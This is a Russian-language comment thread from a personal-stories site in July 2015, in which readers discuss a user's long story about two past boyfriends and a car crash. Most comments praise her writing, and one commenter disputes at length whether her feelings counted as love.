Своего бывшего парня, который пьет я вижу часто, сохранила хорошие отношения с его мамой. А вот Лешу №2 я встретила всего однажды, недавно. Об этом говорится в конце истории.

Сейчас я с другим человеком. Он к этой истории не имеет никакого отношения. И слава Богу :).

Ответить
Поддерживаю Да3 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость
Гость

09 июля 2015 14:17:44
2015-07-09 14:17:44
Да уж позавидовать не чему. Первый раз всегда так горячо, но когда оно не надолго, кажется что зря время пролетело. Такое ощущение что вами попользовались и прощай.
Ответить
Поддерживаю Да0 / Нет1
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 14:23:59
2015-07-09 14:23:59

Гость, А завидовать и необязательно :).

Странное у вас ощущение, никогда даже не думала в таком ключе, ведь и те и те отношения прерывла я, по своей инициативе. И один, и второй парень очень много делали, чтобы эти отношения вернуть, продолжить.

Эх, гости, гости ))))

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость
Гость

09 июля 2015 14:31:35
2015-07-09 14:31:35
Сиреневая Кошка, мне кажется ты просто искала своего человека, но ни тот ни этот Леша не были твоими людьми, отсюда была неуверенность, как бы измены, поиск. А что означает фраза , что после аварии ты переосмыслила свою жизнь? В чём это проявилось?
Ответить
Поддерживаю Да1 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 14:37:53
2015-07-09 14:37:53

Гость*, У меня есть история, зайдите в мой профиль "Первая любовь или как я могла быть такой дурой", если вам истересно. Просто в двух словах этого не объяснишь, а там я все подробно расписывала и об аварии, и о расставании с бывшим.

Если очень коротко, то, пожалуй, я поняла, что живу неправильно, слишком мало думаю о последствиях своих действий. И это чуть не привело меня к смерти. Я поняла, что этот человек - не мой, нам не по пути, и если мы не расстанемся сейчас, есть все шансы угробить свою жизнь впустую.

Ответить
Поддерживаю Да2 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость
Гость

09 июля 2015 14:46:12
2015-07-09 14:46:12
Сиреневая Кошка, да, часто знаки судьбы не случайны... Только сейчас я стала их слушать: увижу плохой сон и уже могу даже остаться дома, если есть возможность.
Ответить
Поддерживаю Да1 / Нет0
Гость из Закарпатья
14699 Гость из Закарпатья
Гость из Закарпатья offline
Репутация : 194001
Комментариев 1403 3
09 июля 2015 14:51:52
2015-07-09 14:51:52

Ни капли осуждения нет... У всех есть те воспоминания в памяти какие оставляют след на всю жизнь. Я читала вашу историю и невольно о вспомнила то

что происходило в моей жизни... Нет, не столь драматично все было, но тоже металась между двумя любящими меня людьми. И не жалею что выбрала своего мужа, а не второго парня. В моем случаи тоже была ревность и желание оградить меня от всех. Но я так жить не могу. Мне нужна свобода. И я сейчас счастлива в своем браке. И вам желаю быть самой счастливой на свете со своим любимым человеком и не мучить себя воспоминаниями.

Ответить
Поддерживаю Да4 / Нет0
Гостюшка
Гостюшка

09 июля 2015 15:26:15
2015-07-09 15:26:15
Читала на одном дыхании. Честно говоря, я вас, автор, понимаю. Ибо сама в 18-20 лет переживала нечто подобное. У меня есть один человек, к которому я периодически захожу на страницу и даже поздравляю с Днём Рождения. Иногда он мне снится, сны очень яркие и красочные. Я замужем, двое деток, очень сильно люблю мужа. Но если вдруг случится в жизни встретить Его, меня тоже тряханет не слабо. Но я выстою. Уверена на 100%. В моем сердце есть уголочек, который посвящён Ему. Он есть, но он очень мал. Так как он есть, конечно, он (уголок) даёт о себе знать. Это не изменить, это не вычеркнуть из памяти. С этим просто нужно смириться. Иногда я задумываюсь, а что было бы, если я бы я поступила по-другому? И, уже будучи взрослее и мудрее, я могу спроецировать эту ситуацию, "построить" модель жизни, что-ли... И понимаю, если бы случилось так, что мы были бы вместе- это было бы ужасно :) Я бы не была так счастлива, он был бы отвратительным отцом, да и добытчиком тоже. Навряд ли я с Ним смогла "обуздать" свой характер и стать более мягкой. Храните его в своём сердце, но уже сейчас вы понимаете, что тот человек, который сейчас рядом с вами, в вашем сердце занимает гораздо больше места.
Ответить
Поддерживаю Да3 / Нет0
Гость
Гость

09 июля 2015 15:27:17
2015-07-09 15:27:17
Хотелось бы поблагодарить вас за эту историю. Читается на одном дыхании. Оля, вы очень хорошо пишете, у вас талант, вам необходимо писать. Ваши истории очень яркие и образные. Ради таких историй, как эта, я и захожу на сайт. Спасибо, что позволили прочесть страничку вашей жизни.
Ответить
Поддерживаю Да4 / Нет0
Scientific
6424 Scientific
Scientific offline
Репутация : 230813
Комментариев 3222 0
09 июля 2015 16:04:34
2015-07-09 16:04:34

Ну, история вовсе не такая уж и страшная да негодная, как обещано. Единственное, что мне не нравится - это терминология. Чувства, которые Вы описывали ну никак не тянут то, чтобы зваться "любовью". И неважно, что они, мол, были "сильные" и всё такое. Не любовь это.

Есть другие названия, но в песнях и стихах обычно не пишут про манию, привязанность, страсть, одержимость. В психологии существует термин "недоброкачественная влюблённость". Но разве хоть в одной истории на сайте человек согласиться написать - "Когда мне исполнилось 17, я встретила ЕГО и у нас возникла недоброкачественная влюблённость". Сила этого чувства кажется прямым доказательством "настоящести" любви, которая конечно же принесёт счастье до гроба.

Ответить
Поддерживаю Да1 / Нет4
Инна Р
19181 Инна Р
Инна Р offline
Репутация : 73528
Комментариев 795 2
09 июля 2015 16:44:47
2015-07-09 16:44:47

Scientific , Даже у Куприна в гранатовом браслете есть деления на любовь-страсть, любовь-ненависть, любовь-дружба, и всё это проявления любви просто где-то что-то превалирует над другим. А что вы хотите, что бы молодая девушка в 18 лет встретила юношу и с ними приключилась бы любовь без страсти? ДЛя такого возраста самое то страстно влюбляться, желать партнёра и телом и душой и может даже телом сильней чем душой. Это уже с возрастом может и приходит более взрослая уравновешенная и адекватная любовь, когда кровь менее бурлит, и отношения сдержанные без помешательства рассудка.

Ответить
Поддерживаю Да3 / Нет0
Инна Р
19181 Инна Р
Инна Р offline
Репутация : 73528
Комментариев 795 2
09 июля 2015 16:49:38
2015-07-09 16:49:38

Инна Р, ой, точнее не ненависть, а я хотела сказать нежность, то есть уже уравновешенное и контролируемое проявление, в отличие от страсти. И любовь-нежность как раз наверно немножко с возрастом и приходит, а в 18 пусть люди сходят с ума от страсти. это нормально.

Ответить
Поддерживаю Да1 / Нет0
Нежная роза
8829 Нежная роза
Нежная роза offline
Репутация : 155294
Комментариев 2309 27
09 июля 2015 17:30:41
2015-07-09 17:30:41
ГОСТЬ, целый год счастья - этому можно позавидовать. Мне жаль, что у истории такой конец. Что Кошка отказалась от человека, который так чувствовал ее, будто она его вторая половинка, ради бывшего. Но сердцу не прикажешь... Желаю счастья в настоящем!
Ответить
Поддерживаю Да0 / Нет0
Оптимист видит наполовину полный стакан, а пессимист - наполовину пустой.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 17:40:00
2015-07-09 17:40:00

Scientific , Скажу честно. Меня почему-то прямо раздражают ваши комментарии. Пишете вечно чушь какую-то, с намеком на авторитетное мнение, пытаясь выдать ее за истину в последней инстанции.

Да откуда вам знать, любила я его или нет? Вам это знать неоткуда, а я могу знать. Я не школьница 12 лет, чтобы мне объяснять, что такое любовь. И если я говорю что я его любила, значит я его любила. Точка.

Я была с этим человеком 3, 5 года. Я с ним жила, ела, спала, отдыхала, болела, делила горести и радости, делила один йогурт пополам. Я этого человека выхаживала полгода, пока он был лежачий, мыла, брила, выносила за ним говно (извините-извините). Терпела его истерики, жертвовала всем: своим здоровьем, своим сном, своим всем, чтобы ему было хорошо, чтобы он стал на ноги, отдавала ему самый вкусный кусок, защищала его от всего, пошла на преступление ради него.

То вы мне пытались рассказывать, что моя ревность - это не ревность. Теперь моя любовь - это тоже не любовь? Я поврторяю, я не девочка-восьмиклассница, мне не нужно навязывать свое понимание любви.

Так что не надо мне, пожалуйста здесь пытаться умничать и рассказывать, кого я любила или не любила. Я это знаю и без вас.

Ответить
Поддерживаю Да2 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 17:40:28
2015-07-09 17:40:28

Извините за вспышку гнева. Зато честно.

Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 17:41:39
2015-07-09 17:41:39

Нежная роза, Спасибо вам.

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 17:44:50
2015-07-09 17:44:50

Гостюшка, Гость, Спасибо большое за понимание и комплименты. Мне очень приятно.

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Scientific
6424 Scientific
Scientific offline
Репутация : 230813
Комментариев 3222 0
09 июля 2015 18:03:58
2015-07-09 18:03:58

Работа с больными людьми отличается от работы с теми у кого "всё кончилось хорошо". Знаете когда у Вас, например, будут дети или, допустим, Вы посмотрите на похожую ситуацию со стороны - Вы оцените это по другому. Вообще идти против "недоброкачественной" с помощью аргументов и фактов - это по выражению одного автора - "как с водяным пистолетиком на танк". Вас захлёстывают эмоции и Вы с яростью броситесь даже на родную мать. "Как это у меня не "настоящая" любовь?". Вот Вы пишете, что многим жертвовали, но разве суть любви именно в жертвенности? Вот масс-медиа старательно утверждают, что именно это и является доказательством любви. И Вы послушно приводите как доказательство именно это. Но почему же тогда Вы сейчас уже не "любите" этого человека? И сколько тут на сайте девочек "жертвовали всем", а потом от их "настоящего" чувства ничего не осталось. Это не доказательство.

Ответить
Поддерживаю Да0 / Нет1
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 18:23:18
2015-07-09 18:23:18

Scientific , Что-то вас понесло не в ту степь. Доказательства любви? Серьезно? Любовь - не теорема Пифагора. Нет единого понятия любви и нет доказательной базы.

Прежде чем спорить с терминологией (вообще неуместное в данном случае слово) полистайте толковые словари, Даля, Ожегова... залезьте в Википедию на крайний случай и почитайте, какое обозначение любви (терминология) дается в разных источниках. Ну и ревность заодно погуглите. Чтобы впредь не опростоволоситься.

Б олее научных понятий, определений, терминов, доказательств любви нет. Ваше понимание не обязательно является верным.

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Неалина
5436 Неалина
Неалина online
Репутация : 449135
Комментариев 7673 30
09 июля 2015 19:09:39
2015-07-09 19:09:39

Сиреневая Кошка, Вы знаете, я когда читала вашу историю на время забыла обо всем. Вы писали от души. Все что было вы выплеснули на страницу интернета. Вам хотелось высказатся. Я точно не скажу но мне показалось может, что вас на это толкнула недавняя встреча-случайная с Легей-2. Еще думаю, что вам в каком то смысле захотелось высказатся и закрыть ту страничку своей жизни в прошлом. Вы пережили это все. У вас новая жизнь и то что было, вы мне кажется должны были пережить все это.

Вы знаете мне не много жаль почему то что с Лешей-2 у вас не сложилось ничего.

Но меня порадовало, что вы встретили того кто дарит вам счастье. Я искренне желаю вам счастья!

Ответить
Поддерживаю Да2 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
*((Ольга))*
16927 *((Ольга))*
*((Ольга))* offline
Репутация : 727368
Комментариев 6117 0
09 июля 2015 19:11:16
2015-07-09 19:11:16
Неалина, помоему, она так и сказала, что толкнуло на написание истории эта случайная встреча)
Ответить
Поддерживаю Да2 / Нет0
Неалина
5436 Неалина
Неалина online
Репутация : 449135
Комментариев 7673 30
09 июля 2015 19:16:15
2015-07-09 19:16:15

Scientific , Вы как нагородите, дак нагородите. Откуда вам знать мысли и чувства определенного человека?Что он думал и чувствовал в определенный период своей жизни. Надеюсь вы в жизни не живете по своим научным подходам.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Неалина
5436 Неалина
Неалина online
Репутация : 449135
Комментариев 7673 30
09 июля 2015 19:18:35
2015-07-09 19:18:35

*((Ольга))* , Может и написала. История длинная я уже честно не помню. Но как то так в голове мысль эта осталась.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Ленин
15274 Ленин
Ленин offline
Репутация : 1060
Комментариев 42 1
09 июля 2015 20:09:44
2015-07-09 20:09:44

Автор, Вы интересно излагаете свои мысли, хоть история и не короткая.

Хорошо, что Вы сейчас осознали, что натворили много глупостей. Вам не стоило прыгать от одного парня к другому. Вы и сам понимаете, что нужно было выбрать одного, тогда и не было бы неправильных поступков и не нужных переживаний.

Автор, здоровья и личного счастья Вам.

Ответить
Поддерживаю Да2 / Нет0
Кто не преодолеет своего страха,не достигнет своих желаний!
Прокурор
19659 Прокурор
Прокурор offline
Репутация : 29536
Комментариев 237 2
09 июля 2015 20:15:18
2015-07-09 20:15:18

Сиреневая кошка, можно я буду на ты? история тяжелая. саентифик конкретно заблуждается считая что история не о любви. как раз это и была любовь, это чувствуется в словах и даже в запятых. тебе полегчало после написания, верно? это самое главное. любви да удачи тебе {#}

Ответить
Поддерживаю Да3 / Нет0
*((Ольга))*
16927 *((Ольга))*
*((Ольга))* offline
Репутация : 727368
Комментариев 6117 0
09 июля 2015 20:22:38
2015-07-09 20:22:38
Да, первая любовь она такая... Яркая, страстная, болезненная.. Вся эта мудрость, спокойствие в отношениях, умиротворенность приходит потом..
Ответить
Поддерживаю Да3 / Нет0
Мандрагора
Мандрагора

09 июля 2015 21:10:32
2015-07-09 21:10:32
Потряссающая история! Вы так искренне все написали. Я соглашусь с теми, кто говорит, что в каждом слове вашего повествования чувствуется правда. Я как будто посмотрела фильм о вашей жизни. Все герои как живые. Немного жаль, что вы не с Лешей2, но может так лучше. Кошка, спасибо вам за историю и отдельное спасибо за такую подачу истории.
Ответить
Поддерживаю Да1 / Нет0
Парень из Таджикистана
Парень из Таджикистана

09 июля 2015 22:17:15
2015-07-09 22:17:15
Автор, на мой взгляд у вас талант. Когда читал, не мог отделаться от ощущения, что читаю \"Три товарища\" Ремарка. Вам надо писать.
Ответить
Поддерживаю Да0 / Нет0
Гость 666
Гость 666

09 июля 2015 22:24:59
2015-07-09 22:24:59
Не смог пройти конечно мимо этой истории, т. к. возможно, что мои комментарии стали мотивацией для её написания в какой-то степени. Было очень интересно читать. Негатива история не вызвала. Когда что-то было, то уже этого не отнять, даже если перекладываешь голову. На вашу жизнь выпало много всего и самое главное, что вы доверили свою жизнь пьяному водителю и потом его ещё и выхаживали. Отдавались всему без остатка до последней капли. Хочется вас поддержать и пожелать вам истинного счастья, любви и взаимопонимания. Удачи вам автор!
Ответить
Поддерживаю Да0 / Нет0
Violetta
14552 Violetta
Violetta offline
Репутация : 1249833
Комментариев 8873 0
09 июля 2015 23:03:29
2015-07-09 23:03:29

Что-что, а писать ты умеешь. {#} Очень интересная история.

Ответить
Поддерживаю Да5 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Акглина
Акглина

10 июля 2015 00:33:56
2015-07-10 00:33:56
Farba, Ну если флирт, то надо было объяснится, ЛЮБОВЬ все прощает.
Ответить
Поддерживаю Да0 / Нет0
Читательница
14629 Читательница
Читательница online
  • Мисс Эрудиция
Репутация : 1102402
Комментариев 16189 6
10 июля 2015 05:40:54
2015-07-10 05:40:54

Увидела, что история длинная, а я такие не люблю, но начала читать и просто, честно, пропала в истории, выпала из реальности и полностью погрузилась в чтение. Было очень интересно! Прям на одном дыхании прочитала! Хотелось даже продолжения! Написано здорово! Спасибо за историю!

Да все мы, наверное, совершали те или иные ошибки, но раз ты поступала именно так, значит просто не могла поступить иначе в тот период времени. Осуждать, кидаться тапками не вижу смысла, ты и сама теперь с позиции опыта знаешь, где ты была права, где была не права. Самое главное, что в те моменты ты испытывала счастье и любила, пусть и так, как могла на тот период времени, но все же это были чувства. Еще раз спасибо за историю, действительно было очень интересно прочитать.

Ответить
Поддерживаю Да6 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Scientific
6424 Scientific
Scientific offline
Репутация : 230813
Комментариев 3222 0
10 июля 2015 10:39:21
2015-07-10 10:39:21

Глупо тыкать Далем и Ожеговым. Они жили тогда, когда наука ещё не делала в определениях различий. В онлайн словаре Даля нет слова "Любовь". В словаре Ожегова есть 6 значений, одно из них - "Интимная связь". Т. е. если брать за истину словарь Ожегова - то интимная связь - это уже любовь (повод зафрендить в фэйсбуке). Интересно было посмотреть Википедию - что пишет главный источник студенческих работ. Вы знаете, всё не плохо, особенно если читать не только первые 15 строчек - есть даже указание на работу Фромма (А это действительно очень хорошая работа по теме, но разве молодые читают).

.
Я могу привести порядка 150 определений любви от различных деятелей, но я приведу Вам лишь одно связаное с этим:
"Каждый день говорят о любви тысячу правдивых истин, самых искренних, но которые противоречат одна другой; и каждый вечер прибавлялась к утренним истинам тысяча ложных, которых опровергнуть невозможно.
П. Ж. Сталь"

.
Одна из целей науки - приведение мыслей в порядок, приведение вещей в порядок. Когда есть этот порядок - то возможна плодотворная работа. Вы пользуетесь компьютером и интернетом и многими другими благами. И это стало возможным благодаря тому, что поколения учёных и инжинеров перерабатывали хаос понятий в достаточно стройный порядок общепринятых определений. Ими легко оперировать, с ними легко договориться.
Я борюсь за такие же вещи. За классификацию и разграничение понятий, которое откроет новые возможности.
Вы против меня. Вы - за то, чтобы сохранялся хаос понятий, чтобы одно слово использовалось для обозначения разных вещей, за то - чтобы каждое последующее поколение всегда всегда наступало на одни и те же грабли и за то - чтобы последующее поколение не могло понять предыдущее.

.

n

У "настоящей" любви нет точных признаков, но есть один косвенный, по поводу которого согласно большинство интересующихся проблемой всерьёз. Доброкачественная любовь не проходит, когда Вы вместе с объектом.
О какой-такой своей "любви" Вы говорите? Сделаем просто. В Вашем тексте 2753 слова. Уже буквально через 411 слов(15% текста) Вы пишете "А потом все пошло на спад. ". Что же это за "любовь" такая? Как быстро Вы затем "пересели на другой стул". Что с того, что Вы "мучались", "ненавидели себя"? Что с того, что "возращались", или "выносили г@вно"? Всё это не является любовью.
И ещё один вопрос для более серьёзных людей. Хотите ли Вы такой "любви" своим детям?
"... ня" это, а не любовь. Поэтому я не согласен когда Вы пишете "Имя этой любви - Леша". Для меня это - никакая не любовь.

.

И да. В интернете так бывает - поспорил с чьим-то мнением, начинаешь спорить и со всеми другими высказываниями этого человека.
Однако позволю себе посоветовать Вам взглянуть на самое последнее предложение из Вашего текста.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

10 июля 2015 12:46:02
2015-07-10 12:46:02
Боже, что вы курите? Это невозможно прочитать полностью
Ответить
Поддерживаю Да0 / Нет1
*((Ольга))*
16927 *((Ольга))*
*((Ольга))* offline
Репутация : 727368
Комментариев 6117 0
10 июля 2015 12:57:27
2015-07-10 12:57:27
Гость, надеюсь, вы это отнесли к предыдущему комментарию? Так как история, хоть и длинная, читается на одном дыхании.
Ответить
Поддерживаю Да2 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
10 июля 2015 13:44:55
2015-07-10 13:44:55

Неалина,Ленин, Спасибо вам.

Прокурор, Конечно, можно та ты. Спасибо за внимание к моей истории и за то, что высказали свое мнение.

Мандрагора , Парень из Таджикистана, Гость 666, Violetta, Всем спасибо за мнения и за комплименты. Особенно за комплименты :))). Приятно.

Ответить
Поддерживаю Да2 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
10 июля 2015 13:47:27
2015-07-10 13:47:27

Scientific , Извините. Да, вы правы, я не имела никакого права на вас наезжать за то, что мое мнение не совпадает с вашим. Прекратим глупый спор. Спасибо, что отписались в моей истории и высказали свое мнение.

Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
10 июля 2015 13:50:32
2015-07-10 13:50:32

Читательница , Видишь, какой ты подвиг совершила ради меня? Прочитала такую длинную историю. {#}

А если серьезно, то я правда переживала, что написала очень длинно, и боялась, что никто не осилит так много букав :). Поэтому вдвойне приятно, что многие прочитали и даже похвалили.

Читательница , П. С. Ну и отдельно спасибо, что не осуждаешь. Хотя и есть за что.

Ответить
Поддерживаю Да2 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Читательница
14629 Читательница
Читательница online
  • Мисс Эрудиция
Репутация : 1102402
Комментариев 16189 6
10 июля 2015 15:32:40
2015-07-10 15:32:40

Гость, Надеюсь, что вы это не об истории? История написана очень хорошо и легко читается в отличии от многих "шедевров" на данном сайте, увлекает с первых строк и не замечаешь, как она уже закончилась.

Ответить
Поддерживаю Да2 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
*((Ольга))*
16927 *((Ольга))*
*((Ольга))* offline
Репутация : 727368
Комментариев 6117 0
10 июля 2015 15:35:31
2015-07-10 15:35:31
Читательница , это точно, увлекает) я даже зашла потом почитать другую истории Оли о первой любви, где как раз о том Леше #1.
Ответить
Поддерживаю Да1 / Нет0
Читательница
14629 Читательница
Читательница online
  • Мисс Эрудиция
Репутация : 1102402
Комментариев 16189 6
10 июля 2015 15:37:05
2015-07-10 15:37:05

*((Ольга))* , а как называется? Я тоже хочу прочитать!

Ответить
Поддерживаю Да0 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
*((Ольга))*
16927 *((Ольга))*
*((Ольга))* offline
Репутация : 727368
Комментариев 6117 0
10 июля 2015 15:45:13
2015-07-10 15:45:13
Читательница , помоему, первая любовь. Как то так) Олю спроси или просто посмотри в ее историях ближе к самым первым историям.
Ответить
Поддерживаю Да2 / Нет0
*((Ольга))*
16927 *((Ольга))*
*((Ольга))* offline
Репутация : 727368
Комментариев 6117 0
10 июля 2015 15:46:36
2015-07-10 15:46:36
Читательница , но как то эта история написана более чувственно.. Как то.. Даже объяснить не могу. В общем, почитай) Оля отлично пишет)
Ответить
Поддерживаю Да2 / Нет0
Читательница
14629 Читательница
Читательница online
  • Мисс Эрудиция
Репутация : 1102402
Комментариев 16189 6
10 июля 2015 15:50:34
2015-07-10 15:50:34

*((Ольга))* ,*((Ольга))* , ок, посмотрю, поищу!{#}

Ответить
Поддерживаю Да1 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
10 июля 2015 16:01:06
2015-07-10 16:01:06

*((Ольга))* ,Читательница , Девочки, вы мою самооценку до небес взвиваете. Скоро короной буду дверные косяки цеплять :))

На самом деле мне очень-очень приятны комплименты моим историям. Во мне видимо умер писатель. Я еще в школе обожала писать сочинения и их часто зачитывали перед всем классом. И сейчас иногда чувствую непреодолимое желание написать что-нибудь.

Я в эту историю правда много вложила: своих чувств, эмоций, воспоминаний. Поэтому мне безумно приятно, что у меня получилось донести свои мысли до читателей.

Спасибо всем-всем за то, что разделили со мной мои воспоминания.

Ответить
Поддерживаю Да6 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Инна Р
19181 Инна Р
Инна Р offline
Репутация : 73528
Комментариев 795 2
10 июля 2015 16:29:14
2015-07-10 16:29:14

Ну яб не сказала что прям умер писатель{#}, а если и так, то его надо в себе срочно воскрешать и начинать писать романы {#}. Вдруг получится издаваться в крупных издательствах?

Ответить
Поддерживаю Да0 / Нет0
Дестини
15851 Дестини
Дестини offline
Репутация : 616951
Комментариев 2814 41
10 июля 2015 16:41:34
2015-07-10 16:41:34

Сиреневая Кошка, у тебя есть дар, пропускать через себя все, что ты пишешь. Потому, твои мысли, чувства чувствуют и другие люди и понимают тебя. В твоих комментариях всегда присутствует искренность, живость ума, каждая строчка живая, потому, как я пришла на сайт, я сразу обратила на тебя внимание. Считаю, что тебе на самом деле стоит развиваться в этом направлении. Немного правда стоит подправить стилистику и тогда все дороги будут открыты. Но самое главное у тебя есть полет мысли, чувства, эмоции. Ты в каждой истории цепляешь с первых предложений и ведешь за собой, и становится неважно, виновата, ты не виновата, в своих поступках, тебе сопереживаешь, тебя чувствуешь в истории. И ты умеешь побуждать чувства у других людей. Многие, читая историю, вспомнили свои отношения, свои поступки.

Мне кажется, что журналистика это точно твое. С тебя бы вышел отличный журналист, 100%. Подумай, а вдруг стоит поступить туда? Жизнь ведь одна и никогда не поздно начать что-то заново.

Ответить
Поддерживаю Да7 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
10 июля 2015 16:43:58
2015-07-10 16:43:58

Дестини, Думаю, ты же знаешь, думаю. Ээээх.

Спасибо, Аня, твое мнение для меня важно. Сегодня у меня прямо день комплиментов.

Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость
Гость

10 июля 2015 18:16:02
2015-07-10 18:16:02
Сиреневая Кошка, вот и меня в последние преследовали такие "гости", такое впечатление. что сидит некто со сломанной судьбой и так и напрягает извилины где бы прицепиться. Даже в моей новой истории наши повод проехаться. Я приняла решение не вступать в диалог с такими. "Невежество всегда хочет на чём-то испражняться" Стругацкие. Твою историю сложно прочитать лишь обкуренному , я ещё когда читала отметила, что легко было читать................ Вот поэтому ещё и хотелось удалить свой аккаунт потому- что человек находится под прицелом маньячек, которые зачем -то отслеживают. Не живут своей жизнью, видимо у них и парня нет никому не нужны, а сидят отслеживают каких-то женщин, чужих жён, матерей. Просто убогие люди.
Ответить
Поддерживаю Да2 / Нет0
*((Ольга))*
16927 *((Ольга))*
*((Ольга))* offline
Репутация : 727368
Комментариев 6117 0
10 июля 2015 18:21:45
2015-07-10 18:21:45
Гость*, о боже, вы и здесь со своей манией преследования...
Ответить
Поддерживаю Да0 / Нет1
Гость
Гость

10 июля 2015 18:25:52
2015-07-10 18:25:52
Так же есть маниакальные пользователи которых я незнаю и знать не хочу, но они всё пытаются вступить в диалог.
Ответить
Поддерживаю Да0 / Нет0
*((Ольга))*
16927 *((Ольга))*
*((Ольга))* offline
Репутация : 727368
Комментариев 6117 0
10 июля 2015 18:27:53
2015-07-10 18:27:53
А есть те, кто несут один негатив и вносят свои болезненные отклонения во все истории)
Ответить
Поддерживаю Да0 / Нет1
Самер
18787 Самер
Самер offline
Репутация : 27620
Комментариев 227 4
10 июля 2015 21:21:20
2015-07-10 21:21:20

Привет Сиреневая Кошка, !! Вы пишите, что история длинная?? Серьезно? Пишу честно.... Мне лично жаль, что такая короткая))) Я хотела бы по-больше подробностей, многих ситуаций, которые Вы решили списать)))

По сути... Очень нтересно было читать. Мне понравилось. Глупостей зделано было достаточно, но на то и есть этот "золотой" возраст - что бы ошибаться))) На Вашу долю выпало много испытаний и очень тяжелых (имею ввиду аварию). Но все уже в прошлом - и это главное!) А парни Ваши бывшие - это здорово... Это чувства, это память, страсть... такое не забывается))) Самое главное, я считаю - это ценить настоящее!!! В настоящем Вы счастливы, нашли то, что искали - это и есть жизнь))) Ваша долгая и счастливая жизнь))) Счастья Вам огромнейшего!!!!!!!!!!{#}{#}

Ответить
Поддерживаю Да4 / Нет0
"Не гоняйся за счастьем, оно всегда находится в тебе самом..."
Нэннеке
19610 Нэннеке
Нэннеке offline
Репутация : 10366
Комментариев 192 0
10 июля 2015 23:44:21
2015-07-10 23:44:21

Да уж, вот это история! По мотивам можно неслабый роман написать или кино снять, даже додумывать ничего не придется. Хорошо, что вы сейчас не с кем-то из героев вашей бурной молодости.

Ответить
Поддерживаю Да2 / Нет0
Нежная роза
8829 Нежная роза
Нежная роза offline
Репутация : 155294
Комментариев 2309 27
11 июля 2015 12:26:59
2015-07-11 12:26:59
Насчет спора любовь-не любовь. Меня поразила в этой истории именно пылкая любовь. На которую я сама не способна, слишком сдержанная, местами даже зажатая. Нет, я влюблялась, конечно, но это была скорее симпатия, тихая привязанность. Даже немного завидую.
Ответить
Поддерживаю Да1 / Нет0
Оптимист видит наполовину полный стакан, а пессимист - наполовину пустой.
Ёлка🎄
18436 Ёлка🎄
Ёлка🎄 offline
Репутация : 5534
Комментариев 111 0
11 июля 2015 16:11:06
2015-07-11 16:11:06

А мне было мало... Я еще читала бы и читала.... Очень интересно, очень. Вам повезло что вы испытали все эти чувства

Ответить
Поддерживаю Да2 / Нет0
Ёлка🎄
18436 Ёлка🎄
Ёлка🎄 offline
Репутация : 5534
Комментариев 111 0
11 июля 2015 16:13:33
2015-07-11 16:13:33

Самер, согласна с Вами)

Ответить
Поддерживаю Да0 / Нет0
Люда
Люда

12 июля 2015 09:01:08
2015-07-12 09:01:08
Я тоже считаю, что написано очень хорошо. Но сначала я поняла по истории , что вы остались с первым Лешей, но прочитав комментарии поняла, что у вас теперь другой парень.
Ответить
Поддерживаю Да0 / Нет0
ксюня-звезда
7355 ксюня-звезда
Ксюня-звезда offline
Репутация : 174111
